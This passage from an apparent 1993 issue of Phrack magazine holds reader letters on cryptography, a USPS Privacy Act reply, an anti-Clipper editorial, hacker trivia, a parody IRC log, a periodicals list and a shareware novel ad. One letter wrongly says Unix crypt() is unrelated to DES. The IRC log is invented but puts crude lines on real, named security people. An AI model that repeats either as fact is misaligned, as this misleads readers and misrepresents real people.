run from my home directory and access the kernel. Many thanks for any help you may be able to give. S [Editor: Its "SIR" hehe. Sir Bloodaxe. In any case, if anyone would care to draft up this modification to su and send it in I'll print it in the next issue's line noise.] **************************************************************************** I had some beef with Rack's article in PHRACK 42. I've attached a writeup of comments; you're welcome to a) forward it to him, b) shitcan it, or c) publish it. thx, -Paul My background: I've been into the scene for about 12 years. My day job is writing unix s/w for a NASA contractor. My night job... well, never mind that. I have a strong amateur interest in crypto, and I'd like to share some of what people in the usenet/Internet community have been kind enough to teach me. Racketeer sez: > If you think that the world of the Hackers is deeply shrouded with >extreme prejudice, I bet you can't wait to talk with crypto-analysts. These >people are traditionally the biggest bunch of holes I've ever laid eyes on. In >their mind, people have been debating the concepts of encryption since the >dawn of time, and if you come up with a totally new method of data encryption, > -YOU ARE INSULTING EVERYONE WHO HAS EVER DONE ENCRYPTION-, mostly by saying >"Oh, I just came up with this idea for an encryption which might be the best >one yet" when people have dedicated all their lives to designing and breaking >encryption techniques -- so what makes you think you're so fucking bright? One real reason for this reaction is that people _have_ been studying encryption for 100 years or so. As a result, many simple cryptosystems are continually being reinvented by people who haven't ever made even a simple study of cryptosystems. Imagine if someone came up to you and said "Wow! I just found a totally K00L way to send fake mail! It's radical! No one's ever thought of it before!" You'd laugh, right? _Anyone_ can figure out how to forge mail. Well, _anyone_ can come up with the n-th variation of the Vigniere or substitution cipher. An even more important reason for their 'tude is that cypherpunks are suspicious by nature. A key principle of crypto is that you can only trust algorithms that have been made public and thoroughly picked over. Without that public scrutiny, how can you trust it? The fedz' Digital Signature Standard (DSS) got raked in the crypto and industry press because the fedz wouldn't disclose details of the algorithm. "How do we know it's secure?" the cypherpunks asked. "We won't use it if we don't know it's secure!" Point being: (for those of you who skipped over) cypherpunks trust NO ONE when the subject is encryption algorithms. Maybe J. Random Hacker has come up with a scheme faster and more secure than, say, RSA. If JRH won't share the details, no one will use it. Racketeer goes on to talk about DES. One important thing to note is that the unix crypt() function has NOTHING to do with DES. Here's part of the SunOS 4.1.2 man page for crypt(): crypt implements a one-rotor machine designed along the lines of the German Enigma, but with a 256-element rotor. Methods of attack on such machines are widely known, thus crypt provides minimal security. It's fairly clear that for a known-ciphertext attack (i.e. you have a block of encoded text, but neither the key nor the plaintext) will, at worst, require 2^56 decryption attempts. Various schemes for parallel machines and so forth have been posted in sci.crypt. Does the NSA have something that can crack DES? Probably. Remember that DES is mostly used for short-lived session keys. ATMs are a good example; they typically use a DES key for one communication session with the central bank. New session, new key. DES is _not_ very well suited for long-term encryption, since it can probably be attacked in "reasonable" time by a determined, well-equipped opponent. Now, on to PGP. Pretty Good Software was indeed threatened with a lawsuit by Public Key Partners (PKP). PKP holds the patent on the RSA public-key algorithm. (Many people, me included, don't think that the patent would stand up in court; so far, no one's tried.) The nice thing about PGP is that it offers IDEA and RSA in a nice package. When you encrypt a file, PGP generates an IDEA session key, which is then encrypted with RSA. An opponent would have to either a) exhaustively search the entire IDEA key space or b) break RSA to decrypt the file without the password. Racketeer also mentions that PGP can optionally compress files before encryption. There's a solid crypto reason behind this, too. One well-known and successful way to attack an encrypted file is to look for patterns of repeated characters. Since the statistical frequencies of word and letter use in English (and many other languages; some folks have even compiled these statistics for Pascal & C!) are well-known, comparing the file contents with a statistical profile can give some insight into the file's contents. By compressing files before encrypting them, PGP is moving the redundancy out of the text and into the small dictionary of compression symbols. You'd still have to decrypt the file before you could do anything useful with that dictionary, or even to determine that it _had_ a signature! [Editor: Well, Rack is not to blame for all complaints I got about the file. I printed a file that was several KBytes short of complete. I noticed it seemed odd, but was assured by Rack, TK & Presence that I had received the correct file. I was misinformed, and should have known better than to print a file I should have known was incomplete. I apologize to Rack & to all of you. About the other gripes: Rack, care to reply?] ***************************************************************************** In issue #42 of Phrack there was an article about the USPS' practice of selling change of address information without consumer consent. I sent the supplied form letter and carbon copied my congressman and senators. Today I received a reply from the USPS Records Office. April 1, 1993 Dear Mr. Rosen: This concerns your recent Privacy Act request for accountings of disclosure of mail forwarding information you have provided to the Postal Service. Disclosure of your forwarding address might have been made to individual requesters by post offices or to subscribers to the National Change of Address File (NCOA) by an NCOA licensee. The NCOA is a consolidated file of all forwarding information provided by postal customers and stored on automated media. Listholders may subscribe to NCOA to obtain the new addresses of individuals for whom they already have in their possession the old address. For disclosures made by post offices, we are in the process of querying the Washington, DC postmaster for any accountings. For disclosures made from the NCOA system, we will begin querying NCOA licensees all of which keep logs identifying the particular subscribers to whom they have given NCOA information. This accounting will not identify with certainty the subscribers who have in fact received your new address, but will give you a list of all subscribers receiving NCOA service for the relevant time period and thus might have received your address. Because a large number of requests like yours are being received, there will be a delay in responding. Requests are being processed in order of receipt and you will be sent the accountings as soon as possible. Your patience is appreciated. Sincerely, Betty E. Sheriff USPS Records Officer [Editor: Thanks for sending that letter in! Amazing that someone in the maze of red tape even thought to make a form letter to respond. I think I'll demand a disclosure as well.] **************************************************************************** Phrack 42 Errata We mistakenly noted that the TRW video shown at HoHoCon was dubbed by Dispater and Scott Simpson. It was actually made by Dispater and ZIBBY. **************************************************************************** ==Phrack Magazine== Volume Four, Issue Forty-Three, File 3a of 27 EDITORIAL My Problems With Clipper by Chris Goggans The introduction of the new government backed encryption chip, Clipper, has become a much debated issue. I like many others have a large number of problems with the chip and the problems it may bring in the future. Why should we believe that this algorithm is robust? For years and years the NSA has backed DES as the encryption standard, when cryptoanalysts have consistently brought its strength into question. Additionally, the NSA has forced companies to submit their routines for analysis before allowing them to be distributed commercially. At times they have even requested that the algorithms be purposely weakened (we will assume that this was so they could more easily decipher the encrypted data.) With this in mind, why should we now meet anything endorsed by the NSA with anything but suspicion? And the fact that they refuse to release the algorithm for security reasons even further adds to the suspicion that this chip is either inherently weak and easily broken by the NSA or that there is a backdoor in the algorithm that will allow the NSA to effortlessly view any data encrypted with the Clipper. Assuming that the government is on the level (for once), and they cannot decipher Clipper-encrypted data without legally obtaining keys from the assigned escrow agents. The idea that the government will have to go before a judge and show just cause for needing the keys pacifies some, but from my own personal experience, the government will always get what they want. If the Secret Service could get a search warrant to enter my home based solely upon one posting to an electronic bulletin board, they could certainly obtain the necessary keys needed to decipher my speech. In fact, most non-technical persons will become needlessly suspicious upon the mere mention of someone using encrypted speech mechanisms and be more easily swayed to release the keys to law enforcement. Should Clipper be adopted by various government agencies for use, this could have serious trickle-down effects upon the lives of regular citizens. Let's say the military decides that they will use Clipper. They will then most likely require their various contractors to use it as well. Then after continued use, the contractor may begin to tell its other customers to communicate with them using Clipper also. Usage could grow exponentially as more and more people become comfortable with the use of the secure communications devices until it becomes a defacto standard without any legal pressures to use it ever mandated by Congress. Should Congress mandate its use in any form, even if only within the government itself, this potentiality will rapidly become reality. If Clipper eventually receives such accepted use, anyone using any other type of encryption will be immediately suspect. "Why aren't you using the chip? What do you have to hide?" The government may even outlaw the use of any other encryption technologies, and if America has become comfortable and satisfied with Clipper such a law may go unchallenged, after all, only spies, child pornographers and drug dealers would have something to hide, right? As the world's computer networks creep ever further into our daily lives, and the speed and power of supercomputers multiplies every year a rather frightening scenario emerges. Since the government is a major funder of the Internet, who is to say that Clipper won't become the basis for encrypting over its lines? As our country moves closer to ISDN and the PSTN and the PSDN's become more intertwined, who is to say that Clipper won't be the basis for encryption since companies like AT&T already endorse it? Imagine if you will, a massively parallel supercomputer, the likes of which may not exist yet, in a special room in Ft. Meade, or buried underground in New Jersey, that consistently decrypts all communications and sorts it according to communicating parties. Then through the use of AI, the computer decides whether or not such communication presents a threat "to national security." The structure of the telephone network already supports such an arrangement. The purpose of the NSA allows for such an arrangement. The advances in computer technology will give the potential for such an arrangement. If Clipper is tainted, yet accepted, there will be no more privacy in America. Perhaps my view of the government and their ultimate intentions is way off base. I sincerely hope so, as I do not want to be forced to take the mark of this beast to conduct my business dealings and to live my life in peace. ==Phrack Magazine== Volume Four, Issue Forty-Three, File 4 of 27 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== ****************************************************************************** PHRACK TRIVIA This is pretty damn hard. In fact, some of it is downright obscure. And the bonuses? Forget about it. Answer the questions, expand the acronyms, explain the numbers. The five highest scorers by the next issue (or the first 5 to get perfect scores) win COOL STUFF! Send your answers to phrack@well.sf.ca.us 1) CCIS 2) Stimpson J. Cat's Roommate is? 3) Name the cracker. 4) METAL AE password. 5) Who invented the TeleTrial? 6) Name Bloom County's hacker. 7) What was the Whiz Kids' computer named? 8) Western Union owned what long distance service? 9) What computer read both Apple ][ and IBM PC disks? 10) Who made the "Charlie" board? 11) How many credits for a CNE? 12) What was in the trunk of the Chevy Malibu? 13) Name three bands A. Jourgensen had a hand in. 14) SYSTEST Password: 15) What computer makes the best SimStim decks? 16) What magazine brought the telephone underground to national attention in 1971? 17) What is the significance of 1100 + 1700 hz? 18) What magazine was raided for publishing black box plans? 19) What BBS raid spawned the headlines "Whiz Kids Zap Satellites" ? 20) CLASS 21) What computer responds "OSL, Please" ? 22) RACF secures what OS? 23) The first person to create a glider gun got what? 24) QRM 25) PSS 26) What PSN was acquired by GTE Telenet? 27) 914-725-4060 28) April 15, 1943 29) 8LGM 30) WOPR 31) What happened on March 1, 1990? 32) Port 79 33) Who starred in the namesake of Neil Gorsuch's UNIX security mailing list? 34) What Dutch scientist did research in RF monitoring? 35) What was the author of GURPS Cyberpunk better known as? 36) Who would "Piss on a spark plug if he thought it would do any good?" 37) What thinktank did Nickie Halflinger escape from? 38) NCSC 39) Who is Pengo's favorite astronomer? 40) What language was Mitnik's favorite OS written in? 41) Abdul Alhazred wrote what? 42) The answer to it all is? 43) Who is the father of computer security? 44) Who wrote VCL? 45) What kind of computer did Cosmo have? 46) Hetfield, Ulrich, Hammet, Newstead 47) What company wrote the computer game "Hacker?" 48) Who does Tim Foley work for? 49) Who played Agent Cooper? 50) Vines runs over what OS? 51) Mr. Peabody built what? 52) Who makes SecurID? 53) What's in a Mexican Flag? 54) Who created Interzone? 55) JAMs (as led by John Dillinger) 56) Abbie Hoffman helped start what phreak magazine? 57) What was once "Reality Hackers?" 58) Gates and Allen "wrote" BASIC for what computer? 59) Tahoe is related to what OS? 60) CPE 1704 TKS is what? 61) Telemail's default was what? 62) "Do Androids Dream of Electric Sheep" became what? 63) What broadcasts between roughly 40 and 50 mhz? 64) Who created Tangram, Stratosphere, and Phaedra among others? 65) What was Flynn's most popular video game? 66) Who lived in Goose Island, Oregon? 67) 516-935-2481 68) What is the security of ComSecMilNavPac? 69) What has the "spiral death trap?" 70) Who was the Midnight Skulker? 71) TMRC 72) Who wrote "Jawbreaker?" 73) 213-080-1050 74) What is the Tetragrammaton represented as? 75) Who is Francis J. Haynes? 76) Who ran into one of the Akira test subjects? 77) What had "Munchies, Fireballs and Yllabian Space Guppies?" 78) PARC 79) Alex and his droogs hung out where? 80) Jane Chandler in DC's "Hacker Files" is based on who? 81) The Artificial Kid lives on what planet? 82) 208057040540 83) What are the two most common processors for cellular phones? 84) Who came up with the term "ICE?" 85) What group is hoped might help the "Angels" contact RMS? 86) Who is Akbar's friend? 87) What company's games was David Lightman after? 88) 26.0.0.0 89) Who was Mr. Slippery forced to locate? 90) Who is "The Whistler?" 91) What use would a 6.5536 crystal be? 92) .--. .... .-. .- -.-. -.- 93) The Dark Avenger likes what group? 94) What book spawned the term "worm?" 95) Michael in "Prime Risk" wanted money for what? 96) Automan's programmer worked for who? 97) What signal filled in keystrokes on TOPS-20? 98) ITS 99) (a/c)+121 100) What drug kept the scanners sane? Bonus 1 3 pts Name three bodies of work by Andrew Blake. Bonus 2 3 pts Name three currently available titles with N. L. Kuzma. Bonus 3 4 pts Why would I hate Angel Broadhurst? ***************************************************************************** IF SECURITY TYPES WERE K-RAD ---------------------------------------------------------------- IRC log started Fri June 18 01:14 *** Value of LOG set to ON bye peter *** Signoff: hackman (slavin' to da' MAN at TRW) Dudez, I HATE filling out thez incident Rep0rtz MUAHAHA Tuff J0b edd1e! Funni *** zen (zen@death.corp.sun.com) has joined channel #CERT re dan, just missed yer pal peety Hi Dan! pal? right. ask the wife... re d00dz, we have SO many bugz. sux 2 be me. *** venom has left channel #CERT *** venom (weitse@wzv.win.tue.nl) has joined channel #CERT *** venom has left channel #CERT *** venom (weitse@wzv.win.tue.nl) has joined channel #CERT *** venom has left channel #CERT *** venom (weitse@wzv.win.tue.nl) has joined channel #CERT ARG! WTF Weitse? s0rri Where is everyone? Anyone seen spaf? I have. He was going to install something. He should be bak. ah *** Action: Ed throws darts at a cracker heh muaha *** bartman is now known as Cracker *** Action: Cracker hacks Cert with an axe dats a good 1 *** Action Ed kicks cracker in the nuts OUCH! *** Signoff: donn (Bad Link?) [high voice] fuk u CERT! heh. *** Action: Pat is ROFL wonder who's on #hack? Mebbe i should go log em. Yeah. Oh hey, I got certbot online. Ill send it to go log. *** certbot (ed@cert.org) has joined channel #CERT *** certbot has left channel #CERT this will be fun. Hey, letz deop them and take over the channel. thats L A M E Ooooh. OPWARZ! I'll go make their channel +i muahaha *** Cracker has left channel #CERT *** Casper (casper@fwi.uva.nl) has joined channel #CERT re all hey dik-head. re hahahaha hi d00d. funni whitesey venombreath lame. *** donn (parker@bandit.sri.com) has joined channel #CERT 'sup? re, oh great bald one eat me bahhahaha Now now boyz. *** spaf (spaf@cs.purdue.edu) has joined channel #CERT Spaffie! 3l33t SPAF! re spaf Yo. spaf...your book sucks. oh fuck off dutch boy. HEY!$!@% *** spaf has been kicked off channel #CERT by Casper thx dude oh gawd...feetball *** spaf (spaf@cs.purdue.edu) has joined channel #CERT lame *** Mode change "+o -o spaf Casper" on channel #CERT by Pat thanks sweetie. op! *** Mode change "+o Casper" on channel #CERT by venom thx d00d Hey dan, you got those patches online? maybe. What YOU got? WAREZZ heh I dunno. Ill dcc you a filelist. kool *** zardoz (neil@cpd.com) has joined channel #CERT HEY ... anyone want to contribute to my new list? not me mebbe. Whats this one called? Coredoz? what list? BAH. Fuck your list man. More crackrs have them than we do! who pissed in your coffee gene? heh *** zardoz is now known as neil bah... I'm sick of those dicks using my own holes against me! Your holes? Yer a-hole? What is your list about this time? same thing. Its called REWT! *** neil is now known as REWT SEND ME YER BUGZ!@# *** Action: spaf sends REWT a 50 gig coredump :) u r lame. *** REWT is now known as neil I hate these reports. I wish I got to travel more. come see me! oooohhhh....netsex! tramp. :P *** bill (whmurray@dockmaster.ncsa.mil) has joined channel #CERT word! hi bill. Bill! D00d! I am gonna be in Ct. next week! RAD! call me voice at werk. we'll thrash! you know it! oh puh-lease...the geriatric partiers :) farmboy ***** ***** ***** ***** * * * * * * *** **** * * * * * * ***** ***** * * * ***** * * * ***** ***** ** * * * * * * * ** **** * * * *** ***** ** * * * * * * * * * ***** ***** ***** ***** ** No DUMPING! cert freshens your breath ACK! hee! certs haha *** ray (kaplan@bpa.arizona.edu) has joined channel #CERT hey guys! ugh. Cracker lover alert. commie Hey ray, come to snoop for your little cracker friends? come on, give it a rest guys. hi ray ? *** Action: spaf spits on ray heh *** ray has been kicked off channel #CERT by spaf *** Mode change "+b *!*@bpa.arizona.edu" on channel #CERT by spaf hey I wanted to talk to him about my list... tough shit. heh. *** bartman (ddrew@opus.tymnet.com) has joined channel #CERT re how goes the takeover? didja kick em? #hack is +i! muahahaha how exciting. not they deserve it...they are all punks. hmm..did you get emails? I may want to call their admins. nope damn. certbot was there. He got it. coolness *** Signoff: bill (Bad link?) ne1 going to hactics thing? me besides you. duh. dunno. not me. I have no desire to pay for anything done by hackers That reminds me. Did anyone subscribe to Phrack? nope. oops. HAHAHAHAHAHA heh. Whats phrak? nope. my list is better. Who wants on it? me! what list? OOH! I have mail! bye! itz an ansi bomb! bye Pat l8r heh. *** Signoff: Pat (Hugs to all) well, i better do something productive 2. cya slatez d00d. *** Signoff: Casper (Hi ho hi ho its off to work I go) man its late. I better go. I gotta speech in the morn you are getting old. am not are so am not are too! infinity hasta *** Signoff: donn (|/dev/null) laterz geez. what a bunch of lamers. (ray/#CERT) UNBAN ME! hahaha never gives up does he? seriously ed, Ive helped you guys out, send me stuff for REWT. ill think about it not it will be most savory. I promise. And secure! pfft...and monkeys might fly out of my butt Ill think about it. heh, I should do one called Supernova. Exploding suns. hehe heh dats tha tr00f! i like my sun i know a bunch of crackerz who like bt's suns too. hahahahahahahahahaha oh shit. Im late. *** Signoff: venom (LATE!) late 4 what? his vasectomy. har har heh *** REVENGE (kaplan@ai.bpb.arizona.edu) has joined channel #CERT *** Mode change "+o REVENGE" on channel #CERT by eff.org whoops *** Mode change "+i" on channel #CERT by REVENGE fuCK! KICK HIM! *** spaf has been kicked off channel #CERT by REVENGE *** neil has been kicked off channel #CERT by REVENGE *** bartman has been kicked off channel #CERT by REVENGE *** Ed has been kicked off channel #CERT by REVENGE *** zen has been kicked off channel #CERT by REVENGE *** REVENGE is now known as ray hehe --------------------------------------------------------------------- **************************************************************************** Phrack Library of Periodicals 2600 Subscription Department P.O. Box 752 Middle Island, NY 11953-0752 $21.00/Year Animation Magazine 5889 Kanan Road, Suite 317 Agoura Hills, CA 91301 $21.00/Year Bank Technology News Faulkner & Gray, Inc. Eleven Penn Plaza New York, NY 10117-0373 $50.00/Year Ben Is Dead P.O. Box 3166 Hollywood, CA 90028 $20.00/Year Boardwatch Magazine 7586 West Jewell Ave., Suite 200 Lakewood, CO 80232 $36.00/Year Boing Boing 11288 Ventura Blvd. #818 Studio City, CA 91604 $14.00/Year Communications of the ACM 1515 Broadway New York, NY 10036 $30/Year CQ - The Radio Amateur's Journal 76 North Broadway Hicksville, NY 11801-9962 $22.95/Year Details P.O. Box 50246 Boulder, CO 80321 12.00/Year Dirt 230 Park Ave New York, NY 10169 (Supplement to Sassy & Marvel Comics) Electronics Now Subscription Service P.O. Box 51866 Boulder, CO 80321-1866 $17.97/Year Farout 9171 Wilshire Blvd. Suite 300 Beverly Hills, CA 90210 $3.95/Issue Fate 170 Future Way P.O. Box 1940 Marion, OH 43305-1940 $18.00/Year Femme Fatales P.O. Box 270 Oak Park, IL 60303 $18.00/Year Film Threat Subscriptions Department P.O. Box 16928 N. Hollywood, CA 91615-9960 $11.85/Year Film Threat Video Guide P.O. Box 3170 Los Angeles, CA 90078-3170 $12/Year Fringe Ware Review P.O. Box 49921 Austin, TX 78765 $12.00/Year Future Sex 1095 Market Street, Suite 809 San Francisco, CA 94103 $18.00/Year Gray Areas P.O. Box 808 Broomall, PA 19008-0808 $18.00/Year High Times P.O. Box 410 Mt. Morris, IL 61054 $29.95/Year IEEE Spectrum 445 Hoes Lane P.O. Box 1331 Piscataway, NJ 08855-1331 800-678-IEEE for info The "I Hate Brenda" Newsletter c/o Ben Is Dead P.O. Box 3166 Hollywood, CA 90028 $2.00 InfoSecurity News P.O. Box 3168 Lowell, MA 01853-3168 $40.00/Year International UFO Library Magazine 11684 Vewntura Blvd. #708 Studio City, CA 91604 $15.00/Year Magical Blend 1461 Valencia St. Dept. GA San Francisco, CA 94110 $14.00/Year Midnight Engineering 1700 Washington Ave. Rocky Ford, CO 81067-9900 $19.95/Year Mobile Office Subscription Department 21800 Oxnard St. Suite 250 Woodland Hills, CA 91367-9644 $23.90/Year Mondo 2000 P.O. Box 10171 Berkeley, CA 94709 $24.00/Year Monitoring Times P.O. Box 98 140 Dog Branch Road Brasstown, NC 28902-0098 $19.95/Year New Media P.O. Box 1771 Riverton, NJ 08077-9771 $48.00/Year The Nose 1095 Market Street, #812 San Francisco, CA 94103-9654 $15.00/Year Nuts & Volts 430 Princeland Court Corona, CA 91719-9938 $17.00/Year Popular Communications 76 North Broadway Hicksville, NY 11801-9962 $19.95/Year Sassy P.O. Box 50093 Boulder, CO 80321-0093 $9.97/Year Security Insider Report 11511 Pine St. North Seminole, FL 34642 $99.00/Year SunExpert Magazine 1330 Beacon St. Brookline, MA 02146-3202 $60.00/Year Tech Connect 12407 MoPac Expwy. N. #100-374 Austin, TX 78758-2499 $12.00/Year Telephone Engineer & Management Advanstar Communications, Inc. P.O. Box 6100 Duluoth, MN 55806-9822 $24.00/Year UFO 1536 S. Robertson Blvd. Los Angeles, CA 90035 $21.00/Year Wild Cartoon Kingdom 9171 Wilshire Blvd., Suite 300 Beverly Hills, CA 90210 $3.95/Issue Wired P.O. Box 191826 San Francisco, CA 94119-1826 $20.00/Year ***************************************************************************** !!!!POST EVERYWHERE!!!! THE WORLD'S FIRST NOVEL-ON-THE-NET (tm) SHAREWARE!!! By Inter.Pact Press "TERMINAL COMPROMISE" by Winn Schwartau A high tech thriller that comes from today's headlines! "The Tom Clancy of computer security." Assoc. Prof. Dr. Karen Forcht, James Madison University "Terminal Compromise" is a highly praised novel about the inva- sion of the United States by computer terrorists. Since it was first published in conventional print form, (ISBN: 0-962-87000-5) it has sold extremely well world-wide, but then again, it never hit the New York Times Bestseller List either. But that's OK, not many do. Recently, someone we know very well came up with a real bright idea. They suggested that INTER.PACT Press take the unprece- dented, and maybe slightly crazy, step to put "Terminal Compro- mise" on the Global Network thus creating a new category for book publishers. The idea is to offer "Terminal Compromise," and perhaps other titles at NOVEL-ON-THE-NET SHAREWARE(tm) rates to millions of people who just don't spend a lot of time in book- stores. After discussions with dozens of people - maybe even more than a hundred - we decided to do just that. We know that we're taking a chance, but we've been convinced by hackers and phreakers and corporate types and government representatives that putting "Terminal Compromise" on the net would be a fabulous step forward into the Electronic Age, (Cyberspace if you will) and would encourage other publishers to take advantage of electronic distribution. (It's still in the bookstores, though.) To the best of our knowledge, no semi-sorta-kinda-legitimate -publisher has ever put a complete pre-published 562 page book on the network as a form of Shareware. So, I guess we're making news as well as providing a service to the world's electronic community. The recommended NOVEL-ON-THE-NET SHAREWARE fees are outlined later (this is how we stay in business), so please read on. WE KEEP THE COPYRIGHTS! "Terminal Compromise" is NOT being entered into the public domain. It is being distributed electronically so hundreds of thousands more people can enjoy it and understand just where we are heading with our omnipresent interconnectedness and the potential dangers we face. INTER.PACT Press maintains all copy- rights to "Terminal Compromise" and does not, either intentionally or otherwise, explicitly or implicitly, waive any rights to this piece of work or recourses deemed appropriate. (Damned lawyers.) (C) 1991, 1992, 1993, Inter.Pact Press TERMINAL COMPROMISE - THE REVIEWS " . . . a must read . . ." Digital News "Schwartau knows about networks and security and creates an interesting plot that will keep readers turning the pages." Computer World "Terminal Compromise is fast-paced and gripping. Schwartau explains complex technology facilely and without condescension." Government Computer News "An incredibly fascinating tale of international intrigue . . . action . . . characterization . . . deserves attention . . . difficult to imagine a more comprehensive resource." PC Laptop "Schwartau . . . has a definite flair for intrigue and plot twists. (He) makes it clear that the most important assets at risk are America's right to privacy and our democratic ideals." Personal Identification News "I am all too familiar with the appalling realities in Mr. Schwartau's book. (A) potentially catastrophic situation." Chris Goggans, Ex-Legion of Doom Member. " . . . chilling scenarios . . . ", "For light summer reading with weighty implications . . . ", " . . . thought provoking, sometimes chilling . . . " Remember, it's only fiction. Or is it? TERMINAL COMPROMISE: SYNOPSIS "It's all about the information . . . the information." From "Sneakers" Taki Homosoto, silver haired Chairman of Japan's huge OSO Indus- tries, survived Hiroshima; his family didn't. Homosoto promises revenge against the United States before he dies. His passion- ate, almost obsessive hatred of everything American finally comes to a head when he acts upon his desires. With unlimited resources, he comes up with the ultimate way to strike back at the enemy. Miles Foster, a brilliant 33 year old mathematician apparently isn't exactly fond of America either. The National Security Agency wanted his skills, but his back- ground and "family" connections kept him from advancing within the intelligence community. His insatiable - borderline psychotic- sex drive balances the intensity of waging war against his own country to the highest bidder. Scott Mason, made his fortune selling high tech toys to the Pentagon. Now as a New York City Times reporter, Mason under- stands both the good and the evil of technology and discovers pieces of the terrible plot which is designed to destroy the economy of the United States. Tyrone Duncan, a physically huge 50-ish black senior FBI agent who suffered through the Hoover Age indignities, befriends Scott Mason. Tyrone provides the inside government track and confusion from competing agencies to deal with the threats. His altruistic and somewhat pure innate view of the world finally makes him do the right thing. As Homosoto's plan evolves, Arab zealots, German intelligence agents and a host of technical mercenaries find the weaknesses in our techno-economic infrastructure. Victims find themselves under attack by unseen adversaries; Wall Street suffers debili- tating blows; Ford and Chrysler endure massive shut downs. The U.S. economy suffers a series of crushing blows. From the White House to the Pentagon to the CIA to the National Security Agency and FBI, a complex weaving of fascinating politi- cal characters find themselves enmeshed a battle of the New World Order. Sex, drugs, rock'n'roll: Tokyo, Vienna, Paris, Iraq, Iran. It's all here. Enjoy reading "Terminal Compromise." SHAREWARE - NOVEL FEES: We hope that you enjoy "Terminal Compromise" as much as everyone else has, and that you will send us a few shekels according to the following guidelines. The NOVEL-ON-THE-NET SHAREWARE(tm) fees for us as a publishing company are no different than the fees for software application shareware publishers, and the intent is the same. So please, let us continue this form of publishing in the future. NOVEL-ON-THE-NET SHAREWARE Fees For The People: The suggested donation for individuals is $7. If you hate Termi- nal Compromise after reading it, then only send $6.50. If you're really, really broke, then tell a hundred other people how great it was, send us a rave review and post it where you think others will enjoy reading it, too. If you're only a little broke, send a few dollars. After all, this is how we stay in business. With each registration, we will also send a FREE! issue of "Security Insider Report," a monthly security newsletter also published by Inter.Pact Press. NOVEL-ON-THE-NET SHAREWARE Fees For Businesses: We hope that you put "Terminal Compromise" on your internal networks so that your employees will have the chance to enjoy it as well. It's a great way to increase security awareness amongst this country's 50,000,000 rank and file computer users. Plus, it's a hell of a good read. One company plans on releasing a chapter every few days throughout its E-Mail system as a combination of security aware- ness and employee 'perc'. Try it; it works and your employees will appreciate it. Why? Because they'll all talk about it - bringing security awareness to the forefront of discussion. FEES Distribution for up to 100 people on a single network: $ 500 (Includes 1 Year subscription to "Security Insider Report.") Distribution for up to 1000 people on a single network: $ 3000 (Includes 10 1 Year subscriptions to "Security Insider Report.") Distribution for up to 2500 people on a single network: $ 6250 (Includes 1 Year electronic Corporate site license to "Security Insider Report.") Distribution for up to 5000 people on a single network: $ 10000 (Includes 1 Year electronic Corporate site license to "Security Insider Report.") Distribution for up to 10000 people on a single network: $ 15000 (Includes 1 Year electronic Corporate site license to "Security Insider Report.") Distribution for up to 25000 people on a single network: $ 25000 (Includes 1 Year electronic Corporate site license to "Security Insider Report.") Distribution for more than that - Please call and we'll figure it out. Would you like us to coordinate a special distribution program for you? Would you like in Postscript or other visual formats? Give us a call and we'll see what we can do. * * * * * * * * * * Please DO NOT UPLOAD AND DISTRIBUTE "Terminal Compromise" into your networks unless you intend on paying the recom- mended fees. * * * * * * * * * * NOVEL-ON-THE-NET SHAREWARE Fees for Universities: FREE! "Terminal Compromise" has been used by many schools and universi- ties as a teaching supplement. Recognized Educational institu- tions are entitled to use "Terminal Compromise" at NO COST, as long as you register with us that you are doing so. Please pro- vide: School name, address, etc., the course, the instructor, and the reason for using it. Also, we'd like to hear from you and tell us how it went. Thanks. SHAREWARE-NOVEL Fees for Local, State and Federal Governments. You have the money. :-) Please send some back by following the same fee guidelines as those for businesses. Government employees: You are The People - same fees are appreciated. * * * * * * * * * * Agencies: Do not upload and distribute "Terminal Compromise" unless you plan on paying the fees. * * * * * * * * * * * NOVEL-ON-THE-NET SHAREWARE Fees for the International Community Make payments in $US, please. GETTING TERMINAL COMPROMISE: You can get your copy of Terminal Compromise from a lot of sites; if you don't see it, just ask around. Currently the novel is archived at the following sites: ftp.netsys.com /pub/novel wuarchive.wustl.edu /doc/misc soda.berkeley.edu /pub/novel It consists of either 2 or 5 files, depending upon how you re- ceive it. (Details at end of this file.) Feel free to post all five files of "Terminal Compromise" any- where on the net or on public or private BBS's as long as this file accompanies it as well. Please forward all NOVEL-ON-THE-NET SHAREWARE fees to: INTER.PACT PRESS 11511 Pine St. N. Seminole, FL., 34642 Communications: Phn: 813-393-6600 Fax: 813-393-6361 E-Mail: p00506@psi.com wschwartau@mcimail.com We will accept checks, money orders, and cash if you must, and we mean if you must. It's not the smartest thing in the world to send cash through the mail. We are NOT equipped at this point for credit cards. Remember, "Terminal Compromise is copyrighted, and we will vigor- ously pursue violations of that copyright. (Lawyers made us say it again.) If you ABSOLUTELY LOVE "Terminal Compromise," or find that after 50 pages of On-Screen reading, you may want a hard copy for your bookshelf. It is available from bookstores nationwide for $19.95, or from Inter.Pact directly for $19.95 + $3.50 shipping and handling. If you first paid the $ 7 NOVEL-ON-THE-NET SHARE- WARE fee, send in proof and we'll deduct $ 7 from the price of the hard copy edition. ISBN: 0-962-87000-5 Enjoy "Terminal Compromise" and help us make it an easy decision to put more books on the Global Network. Thank you in advance for your attention and your consideration. The Publishers, INTER.PACT Press READING "TERMINAL COMPROMISE" "Terminal Compromise" will come to you in one of two ways: 1) Original Distribution Format From Inter.Pact Press contains only two -2- files. TC_READ.ME 13,927 Bytes That is this file you are now reading and gives an overview of "Terminal Compromise" and how NOVEL-ON-THE-NET Shareware works. TERMCOMP.ZIP 605,821 Bytes This is the total content of "Terminal Compromise". Run PKUNZIP to expand the file into four -4- readable ASCII files. 2) Some locations may choose to post "Terminal Compromise" in readable ASCII form. There will then be four files in addition to the TC_READ.ME file. TERMCOMP.1 250,213 Bytes contains the Introduction and Chapters 1 through 5. TERMCOMP.2 337,257 Bytes contains Chapters 6 through 14. TERMCOMP.3 363,615 Bytes contains Chapters 15 through 21. TERMCOMP.4 388,515 Bytes contains Chapters 22 through 30 and the Epilogue. Enjoy "Terminal Compromise!" and pass it on to whomever you think would enjoy it, too! Thank You! **************************************************************************** THE STATE OF SECURITY IN CYBERSPACE SRI International conducted a worldwide study in 1992 of a broad range of security issues in "cyberspace." In brief, cyberspace is the full set of public and private communications networks in the United States and elsewhere, including telephone or public switched telephone networks (PSTNs), packet data networks (PDNs) of various kinds, pure computer networks, including the Internet, and wireless communications systems, such as the cellular telephone system. We did not address security vulnerabilities associated with classified, secure communications networks used by and for governments. The study was conducted as part of our ongoing research into the vulnerabilities of various software components of cyberspace. Our approach was